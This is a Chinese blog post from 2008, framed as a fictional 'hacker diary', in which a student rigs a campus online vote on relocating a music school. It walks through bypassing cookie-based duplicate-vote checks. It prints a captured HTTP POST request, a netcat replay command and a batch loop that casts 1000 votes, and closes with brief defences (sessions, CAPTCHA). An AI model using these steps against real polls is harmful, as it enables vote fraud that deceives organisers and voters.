注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

苗得雨:网事争锋

我们在攻击邪恶和黑暗时要毫不留情,但是也要腾出时间来为善行鼓掌,为光明喝彩!

 
 
 

日志

 
 

黑客日记系列04:挽留爱情,我要“疯”投  

2008-04-19 18:50:35|  分类: 网络安全专栏 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

攻防博弈

Miaodeyu@vip.sian.com

 

黑客日记系列04:挽留爱情,我要“疯”投

博弈主题:校园网络安全

本期黑客:学生小雨

个人专长:渗透技术

技术难度:★★★☆☆

重点知识:抓包技术、Cookies欺骗与SBD的使用

 

校园网络投票现在已经是征询师生意见的一种主流方式了,所有的数据都通过计算机统计,貌似公平而有效。然而,在看似公平的背后其实往往存在着巨大的漏洞,通过几个工具的组合,技术实现的公平在一瞬间就又被技术左右……

3月26日  天气:  

 

无论如何,我都必须承认,爱情是神奇的,不管它降临到了谁的身边,都能够让你陶醉其中,显然我现在也醉了。我深深的爱上了她的一切和这种称之为恋爱的感觉。我喜欢坐在她身边沉醉在她轻轻哼唱的歌声中,我喜欢她那张圆圆笑脸上的可爱酒窝,我喜欢她那个小巧而标准的樱桃嘴,我喜欢她大而灵动的眼睛,那个俏皮的鼻子,雪白如玉的皮肤……

我承认,我是装出来的无所谓,其实当我小心而谨慎的牵着她的手,带她出现在我们学院的公共课上的时候,我能够真实的感受到全系271名男同胞炽热而嫉妒的发疯的眼神。要知道在我们理工学院,女孩儿本来就如同熊猫一样珍稀,而且大多数都长得比较抽象,可想而知这种强烈的对比是多么震撼的视觉冲击,当然你也一定能够想象到此时的我是多么的自鸣得意。

上帝一定是一个开玩笑的高手,正在我刚刚感觉自己开始恋爱了的时候,学校却突然宣布了一个消息,由于学校要扩大规模,因此包括音乐学院在内的几个艺术类学院要选择进行搬迁,而搬迁的地址选择则有师生网络投票决定。我完全不知道音乐学院的那群学生怎么想的,网络投票结果中目前排名第一的竟然是搬迁到200公里以外的一个海边郊县,如果这个结果是最终结果,那么也就意味着,我和她刚刚起飞的爱情很可能转眼就变成可怜的牛郎织女的故事。

不行,这种情况绝不能发生,我必须想办法改变结果,留下她,让她留在我身边,就留在我身边的长安区!

 

决定性的Cookies

 

我打开学校的投票网站反复琢磨,思索着如何敲开这扇紧密的大门,如何才能够留下她。看到这个网页是ASP编写的,我一度想尝试寻找漏洞注入进入数据库直接修改数据,不过有了前几次我挑衅式的攻击,学校的网站安全性已经开始加强了,至少单凭几款傻瓜软件,已经不能够完全敲开它的大门了,无奈我只好另辟蹊径,从投票系统本身下手了。

在投票网站中,音乐学院的四个迁址备选地都列在了上面,我尝试性的对距离现在学校地址最近的“长安区”投了一票,在点击提交选票后,浏览器很快弹出了一个对话框,(图-1)提示我投票成功了。于是我再一次选择“长安区”进行投票,此时系统再一次弹出了一个对话框,提示我已经投过一次票了。显然投票系统加了一个简单的防作弊功能。通常针对网络投票防作弊主要有IP防作弊、Cookies防作弊和Session防作弊手段等。IP防作弊主要使用数据库记录电脑每次投票的IP地址,在每次投票过程中通过分析投票者的IP地址与以投票的数据库IP地址对比,判断是否已经进行过投票。而此时我注意到,学校投票的网址为http://www.edu.cn/vote/vote_xiaozhi.asp?id=39,网站在公网中。正因为学校的投票网址为公网网址,我断定投票系统肯定不会是选择IP防作弊手段,因为学校大多数投票的学生都是在教室机房和网吧进行投票的,而这些地方通常会公用一个公网IP,如果基于IP判断,那么一个教室机房估计只能够投一票,似乎Cookies验证更为贴近现实一些。

 

 

Cookies验证是通过在每个投票的电脑中写入一个对应IP的,且时间设为无限长的Cookies文件(用setCookies()函数)进行判断的。但是一旦用户关闭了浏览器的Cookies功能或将Cookies清空后再一次投票,这种验证方法都将失效。于是我决定验证一下,我首先将系统中的Cookies清空,然后重新打开IE浏览器,将“Internet选项”中的“隐私”设为“阻止所有Cookies”。修改完成后,我又一次进行了重复投票,而此时浏览器并没有弹出重复投票的警告提示,而是顺利的认为我投票成功了,显然我的判断是正确的,音乐学院采用的基于Cookie的验证方法。

 

批量处理的选票

 

如果我有大量的空闲时间,并且不在乎手腕局部抽筋的话,此时我可以一直翻番在浏览器中重复选择刚才的投票动作,用体力换来大量的“有效票”。但是这样似乎并不符合黑客精神的本质,而且她如果知道我为了留下她点击鼠标点到手抽筋,估计也会笑破肚子的,必须采用一个简单易行的办法。

网络投票判断投票成功的条件,往往是根据投票系统接收到的回馈数据进行判断的,根据这个特性,我决定调出WinsockExpert,重复一次刚才已经做过的投票动作,并对此次操作进行抓包。(图2)根据WinsockExpert抓回的数据分析,我注意到其中一个数据包最后写有“choice=137&Submit22.x=74&Submit22.y=31”这段代码。随后我选择了投票中另外一个地区,重复投票抓包。根据最后的数据我发现“choice=137”是控制投票选项选择的关键数据,而其他数据则没有任何意义。

 

 

分析出关键数据之后,我决定利用大名鼎鼎的网络瑞士军刀NetCat—NC完成批量投票的动作。首先我将对“长安区”的投票进行了抓包,之后将其中的

POST /vote/deal.asp?id=39 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, application/x-silverlight,application/xaml+xml, application/vnd.ms-xpsdocument,application/x-ms-xbap, application/x-ms-application, */*

Referer: http://www.edu.cn/vote/vote_xiaozhi.asp?id=39

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR3.0.04506.648)

Host: su.ruc.edu.cn

Content-Length: 46

Connection: Keep-Alive

Cache-Control: no-cache

 

choice=137&Submit22.x=74&Submit22.y=31

 

然后将上述内容复制粘贴到记事本中,并保存为Shuapiao.txt格式的文件。

之后,我将Shuapiao.txt和NC保存在同一个目录中,然后在DOS命令提示符下输入nctoupiao.edu.cn 80 <shuapiao.txt之后,命令提示符窗口提示刷票成功。通过开启浏览器验证,果然结果中多了一票。

虽然用NC直接发送数据省却了许多环节,但是发送1000票需要连续点击1000多次也是我无法忍受的,BAT批处理文件再一次成为了我制胜的武器。(图3)

@ECHO OFF

SET /A counter=0

:top

SET /a counter=%counter%+1

ECHO 已经刷了 %counter% 票

nc toupiao.edu.cn 80 <shuapiao.txt

if %counter% LSS 1000 GOTO :top

ECHO Run complete

 

 

这段BAT之所以如此复杂,除了NC没有非常好的退出机制外,更重要的是,通过这段BAT命令,我可以精确的控制投票的每一个票数。毕竟只有1000多人的一个学院,如果出现上百万的投票就太不现实。

最后的时刻,我将TXT文本、NC和BAT文件复制在一个目录中完成运行,二十分钟后,我得到了1000票的完美结果。我希望技术此时能够留住我的爱情……

 

清理虚假的民意

 

针对越来越多的网络刷票,我们提供了几个相对常见的防范办法:

Session技术

与常用Cookiess防作弊方法基本一样,通过将数据写入一个对应电脑的Session,时间为无限长(相对来说,session比Cookiess安全,因为session是保存在服务器上的,而Cookiess是保存在客户端上的)。

验证码技术

目前在投票前添加必须手工输入的验证码也是较为流行的一种办法,通过随机产生的验证码,对于一些手段相对简单的刷票工具和刷票方法,很容易就能够实现稳定而有成效的防范。

 

黑客战书

 

密码为九宫格中央的数字

 

答案:

 

黑客日记系列04:挽留爱情,我要ldquo;疯rdquo;投 - 苗得雨 - 苗得雨:网事争锋

 

黑客日记系列04:挽留爱情,我要ldquo;疯rdquo;投 - 苗得雨 - 苗得雨:网事争锋

 

黑客日记系列04:挽留爱情,我要ldquo;疯rdquo;投 - 苗得雨 - 苗得雨:网事争锋

 

  评论这张
 
阅读(52)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017